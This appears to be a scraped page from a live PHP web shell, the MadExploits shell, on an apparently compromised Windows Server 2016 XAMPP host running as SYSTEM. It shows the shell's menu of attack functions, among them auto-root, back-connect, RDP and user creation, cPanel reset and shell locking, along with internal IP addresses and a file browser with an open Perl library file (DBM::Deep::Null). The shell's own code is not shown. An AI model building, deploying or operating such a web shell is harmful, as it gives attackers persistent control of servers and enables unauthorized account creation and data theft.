Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
DBM /
Deep /
[ HOME SHELL ]
Name
Size
Permission
Action
Engine
[ DIR ]
drwxrwxrwx
Iterator
[ DIR ]
drwxrwxrwx
Sector
[ DIR ]
drwxrwxrwx
Storage
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Array.pm
9.76
KB
-rw-rw-rw-
ConfigData.pm
5.38
KB
-rw-rw-rw-
Cookbook.pod
6.5
KB
-rw-rw-rw-
Engine.pm
11.06
KB
-rw-rw-rw-
Hash.pm
3.42
KB
-rw-rw-rw-
Internals.pod
11.48
KB
-rw-rw-rw-
Iterator.pm
1.18
KB
-rw-rw-rw-
Null.pm
1.14
KB
-rw-rw-rw-
Sector.pm
617
B
-rw-rw-rw-
Storage.pm
1.59
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Null.pm
package DBM::Deep::Null; use 5.008_004; use strict; use warnings FATAL => 'all'; =head1 NAME DBM::Deep::Null - NULL object =head1 PURPOSE This is an internal-use-only object for L<DBM::Deep>. It acts as a NULL object in the same vein as MARCEL's L<Class::Null>. I couldn't use L<Class::Null> because DBM::Deep needed an object that always evaluated as undef, not an implementation of the Null Class pattern. =head1 OVERVIEW It is used to represent null sectors in DBM::Deep. =cut use overload 'bool' => sub { undef }, '""' => sub { undef }, '0+' => sub { 0 }, ('cmp' => '<=>' => sub { return 0 if !defined $_[1] || !length $_[1]; return $_[2] ? 1 : -1; } )[0,2,1,2], # same sub for both ops '%{}' => sub { require Carp; Carp::croak("Can't use a stale reference as a HASH"); }, '@{}' => sub { require Carp; Carp::croak("Can't use a stale reference as an ARRAY"); }, fallback => 1, nomethod => 'AUTOLOAD'; sub AUTOLOAD { return; } 1; __END__
Close